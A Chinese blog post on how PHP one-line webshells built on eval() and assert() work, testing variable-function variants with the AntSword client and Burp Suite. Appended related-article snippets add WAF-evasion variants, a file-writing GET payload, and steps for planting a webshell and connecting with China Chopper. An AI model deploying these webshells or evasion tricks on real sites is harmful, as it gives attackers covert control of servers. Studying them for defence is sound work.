eval与assert执行一句话木马

原创 已于 2022-07-29 01:18:01 修改 · 2.7k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php

于 2022-07-24 00:04:03 首次发布
本文详细介绍了PHP中eval()和assert()函数的用法,特别是在创建和测试木马场景下的应用。通过实例展示了它们的区别,如eval()适用于执行字符串形式的PHP代码,而assert()则需要一个表达式。文中还分析了为何在某些情况下连接失败,以及如何通过base64编码来解决这个问题。最后,文章强调了在使用这两个函数时应注意的安全问题,特别是参数类型和表达式的正确性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先介绍一下木马中最简单的存在,俗称一句话木马

<?php
eval($_POST[1]);
?>

eval()

eval(str)是把str字符串按照php代码来计算或执行

该str字符串必须是合法的PHP代码,且必须以分号结尾

assert()

assert()包含于头文件assert()中,主要有assert()宏组成,

它接受一个int表达式作为其参数,若表达式求值的结果为真(1),则继续程序的执行;若为假(0),则assert()宏就在标准错误流(stderr)中写入一条错误信息,并同时调用abort()函数来终止程序。

assert()函数的主要功能是用于辅助调试程序。

一、木马测试

1.1  eval()

首先构造如下木马,用蚁剑测试连接

 

连接并可成功修改文件(插入 i love you)

二、升级木马并进行测试

2.1  eval()测试

<?php
$_POST[1]($_POST[2]);
?>

测试 1=eval() 构造 eval($_POST[2])

结果是无法连接,下面分析原因

因为eval是一个语言构造器而不是一个函数,不能被 可变函数 调用PHP 支持可变函数的概念。这意味着如果一个变量名后有圆括号,PHP 将寻找与变量的值同名的函数,并且尝试执行它。

可变函数可以用来实现包括回调函数,函数表在内的一些用途。 可变函数不能用于例如 echo,print,unset(),isset(),empty(),include,require 以及类似的语言结构。需要使用自己的包装函数来将这些结构用作可变函数。

这么看来eval其实并不能算是‘函数’,而是PHP自身的语言结构,如果需要用‘可变’的方式调用,需要自己构造,类似这样子的:

<?php
function eval_1($str)
{
   eval($str);
} 
$a='eval_1';
$a('phpinfo()');
?>

2.2   assert()测试

<?php
$_POST[1]($_POST[2]);
?>

a.   测试 1=assert

 

连接失败!再做其他测试

b.   再选择base64尝试连接,则连接成功!!

c.   测试 1=assert    2=$_POST[3]   base64   连接密码:3

 为什么看似正常的操作,却有的成功连接,有的又失败呢?这是为撒子?

不要慌,看我们接下俩分析:

对于实验 c ,我们利用burpsuit进行抓包并分析,可以看出明显的问题:

 首先注意:

我们要清楚——eval函数中参数是字符,assert函数中参数为表达式 (或者为函数)

这里我们 1 提交的是assert ,2提交的$_POST[3],我们本意是为了执行assert($_POST[3])

而蚁剑同时也post 了 '3' 这个数据变成 %40ini_set 之类的东西,导致assert中又变成了字符串,所以连接失败。

再用butpsuit对未选择base64的实验 b 抓包,可见assert后面的是字符串,因此连接失败!

 而当执行base64时,连接成功,是因为是在执行中多了个 eval() 函数,因此我们实际上是再执行assert(eval()),eval()中参数是字符串,因此连接成功!

assert('xxxx') 里面只有字符串

assert(eval(base64xxxx)); 里面有eval函数

三、 eval()与assert()结合测试

 

 测试链接成功!!

我们抓包查看 ,则能明显发现原因:

我们1提交assert,2提交eval($_POST[3]),构造执行了 assert(eval($_POST[3]))

同时满足assert中参数为函数,eval中参数为字符串。因此执行成功!

总结

最后在强调重点:

eval函数中参数是字符,如:
eval('xxxx');
assert函数中参数为表达式 (或者为函数),如:
assert(phpinfo()) 

evalassert一句话木马分析
weixin_49472648的博客
07-23 2882
利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过蚁剑等webshell工具即可获取和控制整个网站目录。 一般的php一句话后门很容易被网站防火墙waf拦截,而waf通常通过判断关键字来辨别一句话木马,要想绕过waf就需要对木马进行一些变形。............
php eval一句话木马干啥的,eval函数简介PHP一句话木马剖析
weixin_32743045的博客
03-09 1466
eval函数简介PHP一句话木马剖析大家好我是Carol,我的QQ是:906871417一:eval函数1.eval()函数把字符串按照PHP代码来计算。2.该字符串必须是合法的PHP代码,且必须以分号结尾。3.如果没有在代码字符串中调用return语句,则返回NULL。如果代码中存在解析错误,则eval()函数返回false。二:eval函数的一般用法$string="beautiful"...
一句话木马的套路
whatday的专栏
02-23 1724
0×01 前言 尽最大努力在一文中让大家掌握一些有用的 WEBSHELL 免杀技巧。 0×02 关于 evalassert 关于 eval 函数在 php 给出的官方说明是 eval 是一个语言构造器而不是一个函数,不能被 可变函数 调用 可变函数:通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号 (),让系统认为该值是一个函数,从而当做函数来执行 通俗的说比如你...
邪恶的Php一句话木马 assert函数制作简单木马
weixin_30455365的博客
01-14 1557
超级隐蔽PHP一句话木马 很多挂黑链的2B常常用这个方式来入侵网。 代码: $_GET[a]($_GET[b]); 仅用GET函数就构成了木马; 利用方法: ?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT...
php eval 黑客利用,eval一句话木马详细讲解
weixin_29184075的博客
03-28 2558
来解释下它的原理.首先是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行,后面的eval一句话木马的精华部分,使用 eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了Request.form('#')+''这句代 码,Request.form('#')的作用是读取客户端文件中html标记属性中name值被命名为#的部...
一句话木马过狗 php,ASP/PHP一句话木马过安全狗等杀软
weixin_28933797的博客
03-09 1397
站长很辛苦,木马入侵时杀毒软件多数情况并不能起到很好的作用,本博偶尔在入侵过程中会用到的一些过杀软木马,对杀软无力吐槽。虽然我偶尔玩渗透,但是从未搞过无意义的破坏。整理一些常用的PHP、ASP、jsp常用到的一句话木马,部分过安全狗、D盾。看多了之后 自然可以干掉木马……PHP一句话木马1、$hh="p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$h...
php中fputs写入一句话,phpmyadmin写入一句话木马的测试
weixin_42525387的博客
03-11 1054
方法一,一句话木马偶尔拿到一个config中,发现是root,且还有phpmyadmin。好吧,试试select''INTOOUTFILE'E:\Web\wp-content\errors.php'提示成功了,可是构造地址访问,提示404,看来没成功,应该是转义的问题接着尝试:select''INTOOUTFILE'E:\\Web\\xxx.xx.vn\\wp-content\\error...
一句话木马以及免杀
抚琴
01-08 4065
此篇只讨论php,其实原理是相同的,本文的思路依然适用于其他语言 WAF一般都是维护一个规则库,记录webshell常用的函数、方法等等,通过这个规则库匹配从而检测是否是木马.当匹配上对应特征时就是告警,但是规则匹配肯定会有误报,waf一直告警也很烦,所以waf一般会稳定为首要目标,也会放宽一下规则,这就是绕的基础 查杀软件我首先:D盾 『D盾_防火墙』专为IIS设计的一个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下,越少的功能,服务器越安全的理念而设计!限制了
php简短一句话木马免杀,免杀/一句话木马(PHP)
weixin_39598568的博客
03-13 2762
前言在打CTF或渗透时,经常会遇到waf,普通的一句话木马便会被检测出来,打CTF还好,如果是渗透测试那么就有可能直接封IP,而且会发出报警信息。所以要掌握一句话木马的免杀。Webshell检测方式网上有很多免杀的一句话木马,但是如果不知道主流杀毒或waf的检测方式,也只是类似爆破而已,运气好了能进去,运气不好就换下一个payload。因此在此之前,先来了解一下都有哪些检测方式。日志检测使用Web...
PHP一句话木马
热门推荐
bolinmengling的博客
02-27 2万+
一句话木马的普通形式 <?php eval(@$_POST['password']);?> <?php ;?>是php的格式 eval执行函数 POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句话木马通过_POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句话木马通过P​OST是传入的参数,此处使用的...
php assert eval,代码执行函数之一句话木马
weixin_28864249的博客
03-23 2191
前言大家好,我是阿里斯,一名IT行业小白。非常抱歉,昨天的内容出现瑕疵比较多,今天重新整理后再次发出,修改并添加了细节,另增加了常见的命令执行函数如果哪里不足,还请各位表哥指出。evalassert的区别eval特点eval()会把字符串按照php代码来执行(合法的php代码,以分号结尾)eval()是一个语言构造器,不能被可变函数调用eval($_REQUEST[1]); #eval一句话...
一句话木马含义
00勇士王子的博客
04-19 719
<?php @eval($_POST['test']) ?> 我们都知道一句话木马上传后可以连接菜刀或是蚁剑,那这句代码是什么意思呢? 首先,这是PHP一句话木马,要符合PHP代码的格式,php的代码要写在<?php ?>里面,服务器才能认出来这是php代码,然后才去解析。 @表示后面即使执行错误,也不报错。 eval()函数表示括号内的语句字符串什么的全都当做代码执行。 $_POST[‘test’]表示从页面中获得test这个参数值。 ...
一句话木马及免杀
Lum1n0us's Blog
08-12 1万+
这篇文章主要是总结一句话木马,并实现一句话木马的简单免杀,以及一个不死马的实现。 文章目录一句话木马及原理一句话木马简单免杀一、assert()二、字符串拼接三、函数四、request请求五、类六、base64加解密七、写入木马不死马 一句话木马及原理 首先,来看最简单的一句话木马: <?php @eval($_POST['cmd']); ?> 前面的<?php ?>是php的文件格式,@是让程序在执行错误的情况下也不要报错,eval()函数是将括号里的内容都当作代码执行,$_PO
evalassert
weixin_45492087的博客
07-25 992
在2中提交evaleval可以包含字符串,assert只能包含函数。
PHP一句话木马
weixin_64338385的博客
12-03 1227
Get、 Post、Assert 首先在www目录下创建出对应文件 以 .php为后缀名 Get输入 <?php @eval($_GET([‘cmd’]?); //eval把字符串作为PHP代码执行 ?> 保存之后在网页访问 127.0.0.1/get.php?cmd=system(‘ipconfig’); 输入whoami,访问用户名 Post <?php @eval($_POST[‘cmd’]); ?> Post ...
详谈一句话木马的套路
qq_41679358的博客
03-31 610
0×01 前言 尽最大努力在一文中让大家掌握一些有用的 WEBSHELL 免杀技巧。 0×02 关于 evalassert 关于 eval 函数在 php 给出的官方说明是 eval 是一个语言构造器而不是一个函数,不能被 可变函数 调用 可变函数:通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号 (),让系统认为该值是一个函数,从而当做函数来执行 通俗的说比如你 这样是不行的...
简单的一句话木马免杀
2301_77927094的博客
12-21 1280
php的文件格式,@是让程序在执行错误的情况下也不要报错,eval()函数是将括号里的内容都当作代码执行,$_POST['cmd']通过cmd这个参数post提交数据。从上面的演示中可以看到一句话木马的简单、高效,但就是因为其过于简单,查杀起来也很方便,所以要对其进行变形,让它不容易被发现。可以看到普通的一句话木马能被低版本的D盾直接扫出,所以免杀必不可少。可以看到这种方法绕过了2.0.8版本的D盾,初步可以得知这个版本的D盾使用的是关键字特征查杀。必需,规定在字符串的何处开始替换。
php eval一句话木马干啥的,php eval函数一句话木马代码
weixin_28481133的博客
03-09 764
php eval函数一句话木马代码这个是php常见的一句话木马的源码,通过post木马程序来实现木马的植入,eval()函数把字符串按照PHP代码来计算。该字符串必须是合法的PHP代码,且必须以分号结尾。如果没有在代码字符串中调用return语句,则返回NULL。如果代码中存在解析错误,则eval()函数返回false。eval可以用来执行任何其他php代码,所以对于代码里发现了eval函数一定要...
菜刀命令执行漏洞写入一句话木马实验
最新发布
03-19
### 菜刀工具命令执行漏洞实现一句话木马写入的方法 菜刀是一款用于管理基于PHP一句话木马的图形界面工具,其核心在于通过`eval()`函数执行远程传递的命令[^2]。以下是关于如何利用菜刀工具结合命令执行漏洞来写入一句话木马的具体方法: #### 利用过程详解 1. **寻找目标系统的漏洞** 首先需要找到目标系统中存在的命令执行漏洞或其他可以注入恶意代码的地方。这可能是一个未受保护的表单提交、动态参数处理不当等功能。 2. **编写一句话木马脚本** 一句简单的PHP木马通常如下所示: ```php <?php @eval($_POST['password']);?> ``` 这里`$_POST['password']`表示接收来自客户端发送的数据,并通过`@eval()`将其作为PHP代码运行。 3. **上传或植入木马到服务器** 如果存在文件上传漏洞,则可以通过修改HTTP请求头或者绕过MIME类型检测等方式上传上述PHP文件;如果没有直接上传途径,也可以尝试利用已知的安全缺陷(如SQL Injection, XSS等),将该段代码嵌入现有的合法页面中[^1]。 4. **配置并连接菜刀客户端** 安装好菜刀软件之后,在界面上填写刚才部署好的木马URL以及设置密码字段名(即上面例子中的`password`)。点击测试按钮验证连通性后即可获得对该站点的部分操作权限[^3]。 5. **扩展攻击行为** 成功建立会话之后,能够进一步实施更多危害动作比如读取敏感数据、删除重要资料甚至完全接管整个主机环境。值得注意的是某些高级防护机制可能会阻止常规手段下的反序列化触发或是特定语法结构识别失败等问题发生时可考虑替换其他形式的有效载荷加载方式例如使用`assert()`, `call_user_func_array()`等多种替代方案达到相同效果[^4]。 #### 注意事项 - 所有渗透活动都应在授权范围内进行,非法入侵他人计算机信息系统属于违法行为。 - 学习此类技术主要用于提高自我网络安全意识及防御能力而非恶意破坏用途。 ```python # 示例Python脚本模拟向服务端post数据的过程 import requests url = 'http://example.com/shell.php' # 替换为目标实际地址 data = {'password': 'phpinfo();'} # 设置payload内容 response = requests.post(url, data=data) print(response.text) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值